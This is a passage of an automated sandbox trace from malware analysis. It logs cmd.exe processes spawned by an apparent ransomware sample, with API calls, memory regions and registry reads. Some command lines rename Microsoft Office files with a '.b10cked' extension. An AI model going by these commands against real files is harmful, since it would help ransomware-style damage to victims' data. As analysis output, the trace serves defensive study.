_String2="PAUSE") returned -3 [0157.567] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0157.567] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0157.567] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0157.567] _wcsicmp (_String1="move", _String2="MD") returned 11 [0157.567] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0157.567] _wcsicmp (_String1="move", _String2="RD") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0157.568] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0157.568] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0157.568] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0157.568] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0157.568] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0157.568] _wcsicmp (_String1="move", _String2="VER") returned -9 [0157.568] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0157.568] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0157.568] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0157.568] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0157.568] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0157.568] _wcsicmp (_String1="move", _String2="START") returned -6 [0157.568] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0157.568] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0157.568] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0157.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.570] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f164, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f15c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f15c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.570] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0157.572] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0157.572] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0157.572] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0157.572] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~1.trx")) returned 0x2020 [0157.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.572] SetErrorMode (uMode=0x0) returned 0x0 [0157.572] SetErrorMode (uMode=0x1) returned 0x0 [0157.573] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x20eaec, lpFilePart=0x20ead4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", lpFilePart=0x20ead4*="PPINTL~1.TRX") returned 0x3c [0157.573] SetErrorMode (uMode=0x0) returned 0x1 [0157.576] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0157.576] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0157.576] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0157.576] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~1.trx")) returned 0x2020 [0157.576] SetErrorMode (uMode=0x0) returned 0x0 [0157.576] SetErrorMode (uMode=0x1) returned 0x0 [0157.576] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x20ef68, lpFilePart=0x20ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", lpFilePart=0x20ed00*="PPINTL~1.TRX") returned 0x3c [0157.576] SetErrorMode (uMode=0x0) returned 0x1 [0157.576] SetErrorMode (uMode=0x0) returned 0x0 [0157.577] SetErrorMode (uMode=0x1) returned 0x0 [0157.577] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f170, lpFilePart=0x20ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x20ed00*="PPINTL.DLL.trx_dll.b10cked") returned 0x4a [0157.577] SetErrorMode (uMode=0x0) returned 0x1 [0157.577] SetLastError (dwErrCode=0x0) [0157.577] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll.b10cked")) returned 0xffffffff [0157.577] GetLastError () returned 0x2 [0157.577] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20e67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e67c) returned 0x282128 [0157.577] FindNextFileW (in: hFindFile=0x282128, lpFindFileData=0x20e67c | out: lpFindFileData=0x20e67c) returned 0 [0157.578] GetLastError () returned 0x12 [0157.578] FindClose (in: hFindFile=0x282128 | out: hFindFile=0x282128) returned 1 [0157.579] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x281cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281cb8) returned 0x282128 [0157.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0157.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0157.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll")) returned 0x2020 [0157.580] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0157.580] FindClose (in: hFindFile=0x282128 | out: hFindFile=0x282128) returned 1 [0157.581] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e8c8 | out: _Buffer=" 1") returned 9 [0157.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.581] GetFileType (hFile=0x7) returned 0x2 [0157.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e854 | out: lpMode=0x20e854) returned 1 [0157.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.581] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e888 | out: lpConsoleScreenBufferInfo=0x20e888) returned 1 [0157.581] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0157.582] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e8c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0157.582] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e8ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e8ac*=0x1a) returned 1 [0157.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.582] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.582] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.583] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.583] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.583] SetConsoleInputExeNameW () returned 0x1 [0157.583] GetConsoleOutputCP () returned 0x1b5 [0157.583] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.583] exit (_Code=0) Process: id = "264" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21753 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21754 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21755 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 21756 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21760 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 21761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21777 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21778 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21779 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21780 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21781 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 21782 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21783 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21784 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21785 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21786 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21787 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21788 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21789 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21790 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21791 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 21792 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21793 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21794 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21795 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21796 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21797 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21798 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 21799 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21800 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 327 os_tid = 0xf70 [0157.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8dc | out: lpSystemTimeAsFileTime=0x26f8dc*(dwLowDateTime=0x981b9c40, dwHighDateTime=0x1d440a9)) [0157.999] GetCurrentProcessId () returned 0x324 [0157.999] GetCurrentThreadId () returned 0xf70 [0157.999] GetTickCount () returned 0x30618 [0157.999] QueryPerformanceCounter (in: lpPerformanceCount=0x26f8d4 | out: lpPerformanceCount=0x26f8d4*=21478804118) returned 1 [0158.000] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.000] __set_app_type (_Type=0x1) [0158.000] __p__fmode () returned 0x76b331f4 [0158.000] __p__commode () returned 0x76b331fc [0158.000] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.000] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.000] GetCurrentThreadId () returned 0xf70 [0158.000] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf70) returned 0x38 [0158.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.000] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.001] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.001] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f86c | out: phkResult=0x26f86c*=0x0) returned 0x2 [0158.001] VirtualQuery (in: lpAddress=0x26f8a3, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0158.001] GetConsoleOutputCP () returned 0x1b5 [0158.001] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.001] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.002] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.002] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.002] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.002] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.002] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.002] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.002] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.003] GetEnvironmentStringsW () returned 0x370210* [0158.003] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0158.003] GetEnvironmentStringsW () returned 0x370210* [0158.003] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0158.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7dc | out: phkResult=0x26e7dc*=0x40) returned 0x0 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0xa0, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x0, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegCloseKey (hKey=0x40) returned 0x0 [0158.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7dc | out: phkResult=0x26e7dc*=0x40) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: 